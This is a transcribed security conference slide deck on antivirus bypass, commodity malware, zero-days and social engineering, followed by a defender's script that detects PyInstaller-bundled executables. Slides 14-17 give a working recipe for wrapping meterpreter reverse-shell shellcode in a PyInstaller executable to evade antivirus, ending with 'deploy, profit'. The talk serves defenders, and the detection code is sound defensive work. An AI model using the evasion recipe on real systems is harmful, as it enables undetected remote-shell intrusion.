
Give Me Three Things: Anti-Virus Bypass Made Easy

John Strand shows us 3 simple AV Bypass Techniques!

Published in: Technology

  1. Security Weekly™ Presents: Give Me Three Things
     Sometimes, three is bad
     http://securityweekly.com
  2. Brought To You By: consulting@blackhillsinfosec.com
  3. The Need for Focus
     • It is easy to get caught up in the latest “Hack of the day”
     • Let’s talk about iPhone attacks, Android malware, backdoors from chargers, DLP, hacking ATMs, breaking into drones, hacking obscure software X
     • But when we get popped, it is going to be something simple
     • Cool stuff is cool, but the basics will kill you
     http://hacknaked.tv Copyright 2013
  4. #1 Crappy Malware
     • Had enough presentations on the “Not so advanced persistent threat”?
     • Somehow, the belief is that if we can make fun of the attackers’ skill level it makes us… ???
     • Better? Smarter?
     • Why?
     • Because…
  5. Results Matter
  6. About that Malware
     • It tends to be well known
     • It tends to have AV signatures*
     • Tracing it back to a specific group can be hard
     • Anyone can download it
     • It is not 1337 or even 31337 (Just right)
  7. Poison Ivy
  8. Citadel
  9. AV Bypass Made Easy
     • Many of these tools have options to export to a raw string of hex characters
     • In fact, that does not even matter
     • We can use Ghost Writing techniques
     • Simply exporting and re-importing as a script does the trick
     • Flame did this with Lua
     (This and cookies: Why I pentest)
  10. Ghost Writing: Creating the Binary
  11. Converting to Assembly
  12. Editing the Assembly
  13. Finalize the Payload
  14. Python Injection
     • Another technique is to:
       • Convert your payload into raw output
       • Import the raw output into a Python script
       • Convert the Python script into an executable
     • It works because the text sections of an .exe are not reviewed by many AV vendors
     • They would have to write the signature for Python itself
     • Not likely
     • Great write-up by Mark Baggett: http://tinyurl.com/SANS-580-Python-AV-Bypass
  15. Windows AV Bypass - Setup
     • Create a Windows box with prerequisites
     • Same as target (32-bit vs. 64-bit)
     • Install Python: http://www.python.org/
     • Add Python to system PATH
     • Install PyWin32: http://sourceforge.net/projects/pywin32/
     • Install PyInstaller: http://www.pyinstaller.org/
     • Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip
  16. Windows AV Bypass - Config
     • Extract files from PyInjector
     • Move pyinjector.py into the root of the PyInstaller folder
     • Use msfpayload to generate alphanumeric shellcode (on any machine):
       msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more
     • Make sure the payload matches the architecture!
     • Within pyinjector.py:
       • replace: shellcode = sys.argv[1]
       • with: shellcode = '<msfpayload output>'
       • where <msfpayload output> = output from the above msfpayload command
  17. Windows AV Bypass - Compile
     • While in the PyInstaller directory:
       python utils\Makespec.py --onefile --noconsole pyinjector.py
       python utils\Build.py pyinjector/pyinjector.spec
     • New backdoor should be under: [PyInstaller]/pyinjector/dist/pyinjector.exe
     • Rename the executable, deploy, profit
     • Don’t forget your listener!!!
  18. Or You Could Just Choose Option 15
  19. #2 0-day du Jour
     • Yeah, another favorite for attackers
     • There is always another 0-day
     • Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective
     • Why? Because it works
     • They do a lot with volume
     • What is your patch success percentage?
  20. Lessons
     • Black-list AV is easy to bypass
     • In fact, we had to do it with Poison Ivy last week
     • Yeah, a piece of malware 5 years old
     • The attackers will be exactly as advanced as they need to be
     • Which is not very advanced
  21. Focus and Future Plans
     • Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system
     • Get away from Black List Security
     • Now
     • Right now
     • … I mean after this presentation
  22. #3 Users Making “Mistakes”
     • How could we have a presentation without this?
     • There is no way hackers would be this successful without users
     • Ha Ha!!! Users are “dumb”
     • Yeah..
     • Right?
     • Not so fast, sparky
  23. We are all Dumb
     • Or, the pretexts for the attackers are getting really, really good
     • Some SE pretexts we use are not fair
     • Major insurance company and a change of coverage
     • LinkedIn merit badges
     • If the attack is tailored, it is successful
  24. Caller ID Spoofing
  25. Hail Pentest Geek! http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/
  26. Lessons
     • Users are going to make mistakes
     • Not because they are dumb
     • Well, half of them are below average
     • Because they are not trained
     • And because the attackers are good
  27. Focus and Future Plans
     • Hacker Guard Lesson: Once again, focus on attacker actions
     • Limit the damage the user can do
     • Implement firewalls
     • Implement Software Restriction Policies
     • Implement Internet whitelisting
     • But don’t simply believe the user is stupid
     • Train them: Securing the Human
  28. Conclusions
     • While bright shiny objects are bright and shiny
     • We need to come back to basics and fundamentals
     • We lose sight of that in this industry
  29. OCM at Black Hat
     • Offensive Countermeasures at Black Hat 2013
     • http://tinyurl.com/HNTV-BH-2013
  30. End of Line
     • Hack Naked TV Episodes: http://www.hacknaked.tv
     • Watch us:
       • Blip.tv: http://blip.tv/securityweekly
       • YouTube: http://youtube.com/securityweeklytv
     • Subscribe via iTunes: https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2
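The Python injection recipe on slides 14 through 17 ends with a PyInstaller-built executable that is then renamed and deployed. As an added defender-side example (not part of the deck, and not PyInjector or PyInstaller code), the triage script below checks whether a file carries the trailing archive cookie that PyInstaller's bootloader uses to find its embedded archive; the cookie survives renaming the .exe, so it is a cheap host-scan indicator worth correlating with the slide 21 advice to look at attacker impact rather than signatures. The cookie layout (an 8-byte magic followed by four big-endian ints) is assumed from the PyInstaller archive format; the sample bytes are constructed, not a real binary.

```python
import struct
from typing import NamedTuple, Optional

# PyInstaller writes a trailer "cookie" at the end of its bundled archive so the
# bootloader can locate the embedded CArchive. The cookie starts with this 8-byte
# magic; the four ints that follow (archive length, TOC offset, TOC length,
# Python version field) are assumed to be the common part of the 2.x and later
# layouts (later versions append a 64-byte Python DLL name, which we ignore).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8siiii"  # big-endian: magic, pkg_len, toc_pos, toc_len, pyvers
COOKIE_LEN = struct.calcsize(COOKIE_FMT)


class PyInstallerCookie(NamedTuple):
    offset: int   # file offset where the magic was found
    pkg_len: int  # embedded archive length as stated by the cookie
    toc_pos: int  # table-of-contents offset inside the archive
    toc_len: int  # table-of-contents length
    pyvers: int   # raw version field (e.g. 27 for a Python 2.7 bundle)


def find_pyinstaller_cookie(data: bytes) -> Optional[PyInstallerCookie]:
    """Return the parsed cookie if `data` looks like a PyInstaller bundle, else None."""
    off = data.rfind(PYINSTALLER_MAGIC)  # search from the end: the cookie is a trailer
    if off < 0 or off + COOKIE_LEN > len(data):
        return None
    _magic, pkg_len, toc_pos, toc_len, pyvers = struct.unpack_from(COOKIE_FMT, data, off)
    return PyInstallerCookie(off, pkg_len, toc_pos, toc_len, pyvers)


def triage(data: bytes) -> str:
    """One-line verdict for a file's bytes, suitable for a host-scan report."""
    cookie = find_pyinstaller_cookie(data)
    if cookie is None:
        return "no PyInstaller cookie"
    kind = "PE" if data[:2] == b"MZ" else "non-PE"  # PE files start with the MZ stub
    return (f"{kind} with PyInstaller bundle: archive {cookie.pkg_len} bytes, "
            f"TOC at {cookie.toc_pos} ({cookie.toc_len} bytes), pyvers field {cookie.pyvers}")


def build_sample() -> bytes:
    """Constructed sample: fake MZ stub, fake archive body, then a cookie laid out as above."""
    archive_body = b"<fake CArchive body>"
    head = b"MZ" + b"\x00" * 62 + b"<fake bootloader>" + archive_body
    pkg_len = len(archive_body) + COOKIE_LEN  # archive length includes the cookie itself
    return head + struct.pack(COOKIE_FMT, PYINSTALLER_MAGIC, pkg_len, 8, 12, 27)


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage(b"MZ" + b"\x00" * 100))
```

To scan a directory, feed each file's bytes to `triage()` and alert on any hit outside known Python tooling; a renamed executable still matches because the cookie lives in the file body, not the name.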
